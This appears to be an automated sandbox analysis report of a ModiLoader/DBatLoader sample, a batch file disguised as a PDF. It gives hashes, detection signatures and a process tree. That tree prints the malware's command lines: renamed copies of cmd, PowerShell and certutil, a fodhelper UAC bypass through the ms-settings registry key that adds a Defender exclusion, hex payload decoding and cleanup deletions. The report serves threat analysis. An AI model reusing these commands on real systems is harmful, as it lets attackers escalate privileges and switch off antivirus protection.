Analysis
max time kernel: 127s
max time network: 138s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 26/03/2024, 06:45
Static task: static1

Behavioral task: behavioral1
    Sample: CDE_7558497830/CDE_7558497830/CDE_7558497830/CDE_7558497830.pdf
    Resource: win7-20240221-en

Behavioral task: behavioral2
    Sample: CDE_7558497830/CDE_7558497830/CDE_7558497830/CDE_7558497830.pdf
    Resource: win10v2004-20240226-en

Behavioral task: behavioral3
    Sample: CDE_7558497830/CDE_7558497830/CDE_7558497830/CDE_7558497830_PDF.bat
    Resource: win7-20240221-en

Behavioral task: behavioral4
    Sample: CDE_7558497830/CDE_7558497830/CDE_7558497830/CDE_7558497830_PDF.bat
    Resource: win10v2004-20240226-en
General
Target: CDE_7558497830/CDE_7558497830/CDE_7558497830/CDE_7558497830_PDF.bat
Size: 3.6MB
MD5: 75f1ce6a46272e4ece22ad481b8a1ed3
SHA1: f7a7f98e6995bae293d8cd06d5806d1803ea3ed9
SHA256: 41149322a4ee305483bce2d4b7e1a561c5973761dd7c82c9fb21059243dc0b0b
SHA512: 2f9c1a74b94fbb49a79d6d10e97edd2e71c19485e0d6b3509b17bf7cf7f64e82dc2de26303404e1cfbfe8a107bcd8bd1e99619455307e748a8fba5b4f61a1e24
SSDEEP: 49152:0Ppmq12RxHW9ub71aMzQweyrLLX+5Z4yPLyiTvCuP8s7JaqD:A
Malware Config
Signatures
ModiLoader, DBatLoader
    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

ModiLoader Second Stage (1 IoC)
    resource                                                                     yara_rule
    behavioral3/memory/2432-55-0x0000000002F40000-0x0000000003F40000-memory.dmp  modiloader_stage2

Executes dropped EXE (16 IoCs)
    pid   Process
    2896  alpha.exe
    2688  alpha.exe
    2912  alpha.exe
    2500  xkn.exe
    2396  alpha.exe
    2184  alpha.exe
    2532  kn.exe
    1252  alpha.exe
    2356  kn.exe
    2432  Lewxa.com
    2824  alpha.exe
    2408  alpha.exe
    2964  alpha.exe
    2796  alpha.exe
    1696  alpha.exe
    2536  alpha.exe

Loads dropped DLL (9 IoCs)
    pid   Process       entries
    2768  cmd.exe       3
    2912  alpha.exe     1
    2500  xkn.exe       2
    2184  alpha.exe     1
    1248  WerFault.exe  2

Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoC)
    pid   pid_target  Process       procid_target
    1248  2432        WerFault.exe  43

Kills process with taskkill (2 IoCs)
    pid   Process
    1032  taskkill.exe
    2684  taskkill.exe

Modifies registry class (5 IoCs)
    description      ioc                                                                                                          Process
    Set value (str)  \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users "  reg.exe
    Key created      \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell\open\command          reg.exe
    Key created      \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings                             reg.exe
    Key created      \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell                       reg.exe
    Key created      \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell\open                  reg.exe

Modifies registry key (1 TTP, 1 IoC)
    pid   Process
    2388  reg.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
    pid   Process
    2432  Lewxa.com

Suspicious behavior: EnumeratesProcesses (1 IoC)
    pid   Process
    2500  xkn.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
    description              pid   Process
    Token: SeDebugPrivilege  2500  xkn.exe
    Token: SeDebugPrivilege  1032  taskkill.exe
    Token: SeDebugPrivilege  2684  taskkill.exe

Suspicious use of FindShellTrayWindow (14 IoCs)
    pid   Process    entries
    2432  Lewxa.com  14

Suspicious use of SendNotifyMessage (14 IoCs)
    pid   Process    entries
    2432  Lewxa.com  14

Suspicious use of WriteProcessMemory (64 IoCs)
    pid   Process    wrote to memory of  procid_target  entries
    2768  cmd.exe    2636                29             3
    2636  cmd.exe    2240                30             3
    2768  cmd.exe    2896                31             3
    2896  alpha.exe  3048                32             3
    2768  cmd.exe    2688                33             3
    2688  alpha.exe  2452                34             3
    2768  cmd.exe    2912                35             3
    2912  alpha.exe  2500                36             3
    2500  xkn.exe    2396                37             3
    2396  alpha.exe  2388                38             3
    2768  cmd.exe    2184                39             3
    2184  alpha.exe  2532                40             3
    2768  cmd.exe    1252                41             3
    1252  alpha.exe  2356                42             3
    2768  cmd.exe    2432                43             4
    2768  cmd.exe    2824                44             3
    2768  cmd.exe    2408                45             3
    2768  cmd.exe    2964                46             3
    2768  cmd.exe    2796                47             3
    2768  cmd.exe    1696                48             3
    1696  alpha.exe  1032                49             3
Processes
(indentation shows the parent/child relationship; each entry lists the image, the command line, and the signatures that fired on it)

C:\Windows\system32\cmd.exe  (PID 2768)
    cmd /c "C:\Users\Admin\AppData\Local\Temp\CDE_7558497830\CDE_7558497830\CDE_7558497830\CDE_7558497830_PDF.bat"
    Loads dropped DLL; Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe  (PID 2636)
        cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
        Suspicious use of WriteProcessMemory

        C:\Windows\system32\extrac32.exe  (PID 2240)
            extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

    C:\Users\Public\alpha.exe  (PID 2896)
        C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
        Executes dropped EXE; Suspicious use of WriteProcessMemory

        C:\Windows\system32\extrac32.exe  (PID 3048)
            extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

    C:\Users\Public\alpha.exe  (PID 2688)
        C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        Executes dropped EXE; Suspicious use of WriteProcessMemory

        C:\Windows\system32\extrac32.exe  (PID 2452)
            extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

    C:\Users\Public\alpha.exe  (PID 2912)
        C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
        Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory

        C:\Users\Public\xkn.exe  (PID 2500)
            C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
            Executes dropped EXE; Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

            C:\Users\Public\alpha.exe  (PID 2396)
                "C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                Executes dropped EXE; Suspicious use of WriteProcessMemory

                C:\Windows\system32\reg.exe  (PID 2388)
                    reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                    Modifies registry class; Modifies registry key

    C:\Users\Public\alpha.exe  (PID 2184)
        C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\CDE_7558497830\CDE_7558497830\CDE_7558497830\CDE_7558497830_PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9
        Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory

        C:\Users\Public\kn.exe  (PID 2532)
            C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\CDE_7558497830\CDE_7558497830\CDE_7558497830\CDE_7558497830_PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9
            Executes dropped EXE

    C:\Users\Public\alpha.exe  (PID 1252)
        C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
        Executes dropped EXE; Suspicious use of WriteProcessMemory

        C:\Users\Public\kn.exe  (PID 2356)
            C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
            Executes dropped EXE

    C:\Users\Public\Libraries\Lewxa.com  (PID 2432)
        C:\\Users\\Public\\Libraries\\Lewxa.com
        Executes dropped EXE; Suspicious behavior: CmdExeWriteProcessMemorySpam; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage

        C:\Windows\SysWOW64\WerFault.exe  (PID 1248)
            C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 780
            Loads dropped DLL; Program crash

    C:\Users\Public\alpha.exe  (PID 2824)
        C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
        Executes dropped EXE

    C:\Users\Public\alpha.exe  (PID 2408)
        C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
        Executes dropped EXE

    C:\Users\Public\alpha.exe  (PID 2964)
        C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
        Executes dropped EXE

    C:\Users\Public\alpha.exe  (PID 2796)
        C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
        Executes dropped EXE

    C:\Users\Public\alpha.exe  (PID 1696)
        C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
        Executes dropped EXE; Suspicious use of WriteProcessMemory

        C:\Windows\system32\taskkill.exe  (PID 1032)
            taskkill /F /IM SystemSettings.exe
            Kills process with taskkill; Suspicious use of AdjustPrivilegeToken

    C:\Users\Public\alpha.exe  (PID 2536)
        C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
        Executes dropped EXE

        C:\Windows\system32\taskkill.exe  (PID 2684)
            taskkill /F /IM SystemSettingsAdminFlows.exe
            Kills process with taskkill; Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe  (PID 2984)
        cmd /c del "C:\Users\Public\alpha.exe" / A / F / Q / S
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 2.6MB
MD5: 6d75d7c7cc50099ca677b647ca9ce8d3
SHA1: b0bb8832ccbc990c8f6c69ec61c2e73bc9bc8cad
SHA256: 6ef611c9602ce5918ab87951f9ffd851b1fb53decbd199d073a9823d6b330bf4
SHA512: b2d93df8a1ae31b052045a50bf5ca10b80e9e3d34359bac69d5626ccc399e375b66b07cca1fd202435fb526ae7f9bde1f56bb8767b5a9051d59de9829d45e2b2

Filesize: 1.3MB
MD5: 2dfc4938d980a733ca8484df24df9886
SHA1: 4660364cb6a885580eb67731ae6b2bd32842d07d
SHA256: 26d0349541b20a4c51524c7f422946667fa1261e42c0eec960dbb368030ced25
SHA512: de7f56d137a97dd172fffe54325d8718cfc1bdebf0c210e2308da7ba437b79a59096e3b0db03abb4f0b6005114df436a8ffb997ffe3cba08c89b818636f7b4ea

Filesize: 337KB
MD5: 5746bd7e255dd6a8afa06f7c42c1ba41
SHA1: 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256: db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA512: 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Filesize: 64KB
MD5: ef70856e875a628e03df9867f6a9abd6
SHA1: 97f8064fe2197d6002068d8380410fdfc81730e5
SHA256: f168a9bab7a544fab673f52abdf4e14dce7b624fab336545e6ea66919680fe61
SHA512: bb1b204f213d5ebe8b85082e17c5f8fdf20837bba08e486db08e3abceef16de2b4c4be053b1a300ece7f793bea360c5d6bdfb2684780fa2de87af9682ed7b396

Filesize: 1.1MB
MD5: ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1: ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA256: 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA512: 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Filesize: 462KB
MD5: 852d67a27e454bd389fa7f02a8cbe23f
SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d